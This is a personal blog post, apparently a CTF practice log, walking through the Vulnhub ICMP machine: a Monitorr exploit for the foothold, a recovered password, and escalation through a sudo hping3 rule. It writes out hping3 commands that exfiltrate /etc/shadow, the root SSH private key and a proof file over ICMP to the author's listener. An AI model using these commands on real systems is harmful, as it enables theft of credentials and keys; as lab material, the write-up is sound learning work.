I haven’t written a post for a bit; been feeling a bit burned out. Still doing something productive every day - no zero days.

What have I done since I last wrote?

  1. HTB Time. This is an active machine, so no writeup just yet.
  2. THM Vulnet. This is basically Shuriken from Vulnhub. I haven’t written it up and I probably won’t, even though I quite liked it.
  3. Vulnhub ICMP.

I had a quick go at Vulnhub Crossroads and didn’t like it. It’s a webpage ripped from what appears to be a real drug/alcohol rehab facility. Way to stay classy.

ICMP Foothold

This thing runs Monitorr 1.7.6 which has multiple vulns; the python exploit from Searchsploit works.

User Fox

We are www-data but we can read a file belonging to fox called reminder. It says:

crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

There is a directory called devel but we can’t do a listing. We intuit that crypt.php is in devel, and we can read it; it contains the password for Fox.

Privesc (sort of)

$ sudo -l
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3

This was a little new to me. I’ve done a hping3 privesc before where you just run the binary with no arguments; this gets a command prompt we can use to launch a shell. In this case, we have to have an argument. The argument is a host.

I make a new directory and touch a file:


Now when I run:

sudo -u root /usr/sbin/hping3 --icmp *

it pings my box. We can exfil files. Local machine:

└─# hping3 --listen -I eth0 --sign MSGID1  

Remote machine:

$ sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 150 -c 1 --file /root/proof.txt
HPING (enp0s3 icmp mode set, 28 headers + 150 data bytes
[main] memlockall(): Operation not supported
Warning: cant disable memory paging!
len=178 ip= ttl=64 id=24284 icmp_seq=0 rtt=8.3 ms

--- hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 8.3/8.3/8.3 ms

And we get:


We can also use this to exfil the shadow file:

sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 9999 -c 1 --file /etc/shadow

We can also use it to exfil the SSH private key:

sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 1000 -c 3 -i 5 -u --file /root/.ssh/id_rsa

However, at the moment it keeps telling me the key is in an invalid format, even though it looks okay. So, yeah.